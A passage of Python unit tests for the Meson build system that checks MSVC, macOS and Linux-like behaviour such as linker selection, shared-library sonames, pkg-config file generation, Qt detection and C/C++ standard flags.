appstore_dir = fr'C:\Users\{username}\AppData\Local\Microsoft\WindowsApps'
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest(f'Could not find {name}.')
envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP[f'{lang}_ld']]
# Also test a deprecated variable if there is one.
if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
envvars.append(
mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest(f'Could not find a compiler for {lang}')
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = f'PE file: {f!r}, compiler: {cc_id!r}, linker: {ld_id!r}'
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if OptionKey('b_vscrt') not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
def test_compiler_checks_vscrt(self):
'''
Test that the correct VS CRT is used when running compiler checks
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if OptionKey('b_vscrt') not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
def sanitycheck_vscrt(vscrt):
checks = self.get_meson_log_sanitychecks()
self.assertTrue(len(checks) > 0)
for check in checks:
self.assertIn(vscrt, check)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=release'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=md'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mt'])
sanitycheck_vscrt('/MT')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mtd'])
sanitycheck_vscrt('/MTd')
def test_modules(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'C++ modules only work with the Ninja backend (not {self.backend.name}).')
if 'VSCMD_VER' not in os.environ:
raise unittest.SkipTest('C++ modules is only supported with Visual Studio.')
if version_compare(os.environ['VSCMD_VER'], '<16.10.0'):
raise unittest.SkipTest('C++ modules are only supported with VS 2019 Preview or newer.')
self.init(os.path.join(self.unit_test_dir, '86 cpp modules'))
self.build()
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '148 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '104 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
def test_objc_versions(self):
# Objective-C always uses the C standard version.
# Objecttive-C++ always uses the C++ standard version.
# This is what most people seem to want and in addition
# it is the only setup supported by Xcode.
testdir = os.path.join(self.objc_test_dir, '1 simple')
self.init(testdir)
self.assertIn('-std=c99', self.get_compdb()[0]['command'])
self.wipe()
testdir = os.path.join(self.objcpp_test_dir, '1 simple')
self.init(testdir)
self.assertIn('-std=c++14', self.get_compdb()[0]['command'])
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '24 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
@mock.patch.dict(os.environ)
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar')
self.assertEqual(libhello_nolib.get_pkgconfig_variable('prefix', {}), self.prefix)
self.assertEqual(libhello_nolib.get_pkgconfig_variable('escaped_var', {}), r'hello\ world')
self.assertEqual(libhello_nolib.get_pkgconfig_variable('unescaped_var', {}), 'hello world')
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() in {'gcc', 'clang'}:
for name in {'ct', 'ct0'}:
ct_dep = PkgConfigDependency(name, env, kwargs)
self.assertTrue(ct_dep.found())
self.assertIn('-lct', ct_dep.get_link_args())
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
# See common/44 pkgconfig-gen/meson.build for description of the case this test
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content)
self.assertIn('Libs.private: -lz', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
@mock.patch.dict(os.environ)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \(qmake\)\n')
def test_qt6dependency_qmake_detection(self):
'''
Test that qt6 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt6'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 6' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 6.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt6
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt6 \(modules: Core\) found: YES .* \(qmake\)\n')
def glob_sofiles_without_privdir(self, g):
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '36 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '36 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir: str, compiler: 'Compiler') -> None:
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_cpp20 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=10.0.0', None) or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=10.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
key = OptionKey('std', lang=compiler.language)
for v in compiler.get_options()[key].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
elif '++20' in v and not has_cpp20:
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
self.init(testdir, extra_args=[f'-D{key!s}={v}'])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = f" -std={v} "
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print(f'{key!s} was {v!r}')
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if compiler.language == 'c':
env_flag_name = 'CFLAGS'
elif compiler.language == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError(f'Language {compiler.language} not defined.')
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc)
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp)
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '42 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
